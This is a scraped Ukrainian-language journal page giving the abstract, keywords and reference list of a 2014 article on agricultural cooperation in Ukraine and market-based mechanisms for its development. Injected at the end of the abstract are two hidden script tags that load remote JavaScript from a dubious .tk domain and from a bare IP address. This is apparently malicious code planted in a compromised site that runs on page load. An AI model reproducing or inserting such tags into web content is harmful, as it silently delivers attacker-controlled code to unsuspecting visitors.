ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: [338.43:334.73]:339.1
Економіка агропромислового виробництва

Сільськогосподарська кооперація: ринкові механізми розвитку / Борщевський В. В., Магас В. М. // Економіка АПК. - 2014. - № 10 - С. 14

Досліджено феномен сільськогосподарської кооперації в контексті дії ринкових механізмів самоорганізації. Встановлено, що основною причиною недостатнього поширення кооперації в аграрному секторі України є намагання запроваджувати її адміністративними методами. Це зумовлює формальний характер функціонування кооперативних структур та їхню фактичну нежиттєздатність. Натомість у розвинутих країнах світу, зокрема в країнах-членах ЄС, сільськогосподарська кооперація функціонує, насамперед, на основі ринкових механізмів. Тому пріоритетними напрямами активізації кооперативних об’єднань у сільському господарстві України мають стати: розвиток сільськогосподарського підприємництва, удосконалення інфраструктури аграрного ринку, його демонополізація та стимулювання конкуренції, створення сучасного інституційного середовища, покликаного забезпечити можливості для повноцінної реалізації учасниками виробничих, обслуговуючих, споживчих і кредитних кооперативів своїх економічних інтересів. Бібліогр.: 23.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: сільськогосподарська кооперація, ринкові механізми, самоорганізація, інститути, соціальний капітал

Список використаних джерел

 1. Державна цільова програма розвитку українського села на період до 2015 року [Електронний ресурс]. – Режим доступу: http://minagro.gov.ua/apk?nid=2976.
 2. Для розвитку кооперації в Україні немає жодних підстав [Електронний ресурс]. – Режим доступу: http://zik.ua/ua/news/2013/09/30/431838.
 3. Зіновчук В.В. Організаційно-правові засади становлення сільсько­госпо­дарської кооперації в Україні / В.В. Зіновчук [Електрон­ний ресурс]. – Режим доступу : http://www.znau.edu.ua/visnik/2012_1_2/3.pdf.
 4. Зіновчук В.В. Роль кооперації у реалізації диверсифікаційних намірів сільськогосподарських товаровиробників / В.В. Зіновчук, В.І. Ткачук [Електронний ресурс]. – Режим доступу: http://www.znau.edu.ua/visnik/2011_2_2/131.pdf
 5. Клокар О. Нормативно-правове забезпечення розвитку сільсько­госпо­дарської кооперації / О. Клокар [Електронний ресурс]. – Режим доступу: http://www.vestnikdnu.com.ua/archive/201374/217-222.htm.
 6. Клокар О. Сільськогосподарська кооперація в Україні: ретроспективний та перспективний аналіз ефективного розвитку [Електронний ресурс]. – Режим доступу: /sites/default/files/eapk/2011/2011_10/11_10_22.pdf
 7. Кооперація [Електронний ресурс]. – Режим доступу: http://uk.wikipedia.org/wiki/Кооперація.
 8. Кропоткин П.А. Взаимопомощь как фактор эволюции / П.А. Кропоткин [Электрон­ный ресурс]. – Режим доступа : http://www.klex.ru/cjr.
 9. Львівські села рятуватимуть кооперацією [Електрон­ний ресурс]. – Режим доступу : http://grim.in.ua/photo/2013/09/30/2379.
 10. Малік М.Й. Проблеми та перспективи розвитку сільськогосподарських обслуговуючих кооперативів / М.Й. Малік, О.А. Козак / Розвиток сіль­сь­ких територій: Сільськогосподарська кооперація. – Зб. наук. праць еконо­містів-аграрників. – Львів: Львівський нац. ун-т ветери­нарної медицини та біотехнологій імені С.З. Гжицького, 2012. – С. 7-13.
 11. Павличенко М.Г. Розвиток кооперації в молочній галузі / М.Г. Павличенко // Економіка АПК. – 2009. – № 5. – С. 38-48.
 12. Пантелеймоненко А.О. Неприбуткова природа кооперативних організацій / А.О. Пантелеймоненко // Українська кооперація: Електронний журнал. – 2009. – № 2 [Електронний ресурс]. – Режим доступу: http://ukrcoop-journal.com.ua/2009-2/num/pantelejmonenko.htm.
 13. Програма розвитку сільськогосподарських обслуговуючих коопе­ративів Ук­раїни на 2013-2020 роки. – К.: Союз сільськогосподарських об­слу­го­ву­ю­чих кооперативів України [Електронний ресурс]. – Режим доступу: http://www.coop-union.org.ua/wp-content/uploads/ProgrammSOK_new_ver.pdf (проект).
 14. Сіра Е.О. Соціально-економічні проблеми розвитку сільськогосподарської кооперації в Україні / Е.О. Сіра [Електронний ресурс]. – Режим доступу: http://www.rusnauka.com/2_KAND_2014/Economics/12_156348.doc.htm.
 15. Туган-Барановский М.И. Социальные основы кооперации / М.И. Туган-Барановский. – М.: Экономика, 1989. – 496 с.
 16. Фукуяма Ф. Великий крах. Людська природа і відновлення соціального порядку. – Львів: Кальварія, 2008. – 308 с. 
 17. Хайек Ф. Пагубная самонадеянность. Ошибки социализма / Ф. Хайек. – М.: Новости, 1992. – 304 с. 
 18. Черевко Г.В. Явище кооперації в аграрній економіці: проблеми розвитку / Г.В. Черевко / Наукові і практичні аспекти сільської кооперації. Зб. наук. доп. – Львів: Львівський нац. аграр. ун-т, 2013. – С. 200-205.
 19. Dannenberg P. The importance of Agrarian Clusters and Chains in Rural Areas – examples from Poland and Germany / Peter Dannenberg. – Workshop “Industrial Upgrading, Offshore Production and Labor” / Social Science Research Institute (SSRI). Duke University. – 2006. – November, 9-10 [Електрон­ний ресурс]. – Режим доступу : http://www.cggc.duke.edu/pdfs/workshop/ Dannenberg_Presentation.pdf.
 20. Figiel S. Uwarunkowania rozwoju klastrów rolno-żywnościowych w Polsce / Szczepan Figiel, Justyna Kufel, Dominika Kuberska [Електрон­ний ресурс]. – Режим доступу : https://www.ierigz.waw.pl/download/Mjg5OA.
 21. Hanson J.С. Agricultural Cooperatives and Unions of Cooperatives in Bosnia and Herzegovina: Opportunities for Improvement in Providing Services and Educational Programs for Farmers/ James C. Hanson, Miodrag Matavulj, Gregory Manzuk and John G. Richardson // Journal of Rural Cooperation. – 2010. – Vol. 38. – No. 1. – P. 3-19.
 22. Murray С. Social Capital and Cooperation in Central and Eastern Europe – A Framework for Research on Governance / Catherine Murray // Journal of Rural Cooperation. – 2008. – Vol. 36. – No. 1. – P. 3-20.
 23. Vilpoux O. F. Agrarian reform and cooperation between settlers in the Midwest of Brazil: An institutional approach / Olivier F. Vilpoux [Електрон­ний ресурс]. – Режим доступу : http://www.researchgate.net/publication/261716312_Agrarian _reform_and_cooperation_between_settlers_in_the_Midwest_of_Brazil_An_institutional_approach.
Читати статтю: 14_10_14-19.pdf